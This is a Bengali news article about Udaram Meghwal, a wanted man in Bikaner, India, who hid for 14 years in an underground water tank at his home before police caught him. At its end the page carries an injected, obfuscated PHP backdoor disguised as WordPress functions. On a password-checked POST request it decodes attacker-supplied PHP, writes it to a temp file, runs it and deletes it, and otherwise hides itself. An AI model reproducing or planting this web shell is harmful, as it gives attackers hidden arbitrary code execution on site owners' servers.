মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

পুলিশ থেকে বাঁচতে মাটির নিচে ১৪ বছর

v_117091আন্তর্জাতিক ডেস্ক : বেশ কয়েকটা ফৌজদারি মামলার আসামি উদারাম মেঘওয়ালকে খুঁজছিল পুলিশ। কিন্তু তিনি হঠাৎই উদাও হয়ে যান। তাকে খুঁজে পেতে পুলিশ ১৪ বছর ধরে চেষ্টা চালিয়েছে। অবশেষে বাড়ির পানির ট্যাঙ্ক থেকে তাকে পাকড়াও করেছে ভারতের রাজস্থান রাজ্যের বিকানেরের পুলিশ।

শনিবার বিবিসি অনলাইনের খবরে বলা হয়, বছর দশেক আগে উদারামের নিখোঁজ হয়ে যাওয়ার একটি ডায়েরি করেছিলেন তার স্ত্রী। তাতে অভিযোগ জানানো হয়েছিল, কেউ হয়তো উদারামকে অপহরণ করেছে।

সেই উদারাম বাড়িতেই ছিলেন। বাড়ির মাটির নিচে একটি পানির ট্যাঙ্কে থাকতেন তিনি! সেটা বুঝতে পুলিশের ১৪ বছর লেগে গেল।

বহু খুঁজেও কেন পাওয়া যায়নি তাকে, সেটা ধরা পড়ার পর নিজেই পুলিশের কাছে স্বীকার করেছেন উদারাম।

ছাতারগড় থানার অফিসার হংসরাজ লুনা স্থানীয় সংবাদমাধ্যমকে জানান, “উদারাম বলছেন তিনি দিনের বেলায় মাটির নিচের জলের ট্যাঙ্কে থাকতেন, আর রাতে ঘরে ঢুকে যেতেন। ট্যাঙ্কের মধ্যেই থাকার ঘরও বানিয়ে নিয়েছিলেন তিনি। আমরা সেজন্যই বারবার তার বাড়িতে তল্লাশি চালিয়েও ধরতে পারতাম না তাকে।”

ধরা পড়ার দিনও উদারামের বাড়িতে পুলিশ গিয়েছিল। তাদের কাছে খবর ছিল যে তিনি বাড়িতেই আছেন। তবুও পাওয়া যায়নি তাকে।

শেষমেশ জলের ট্যাঙ্কের দিকে নজর পড়ে পুলিশের। সেখানে নিজের থাকার ঘরেই লুকিয়ে ছিলেন উদারাম।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}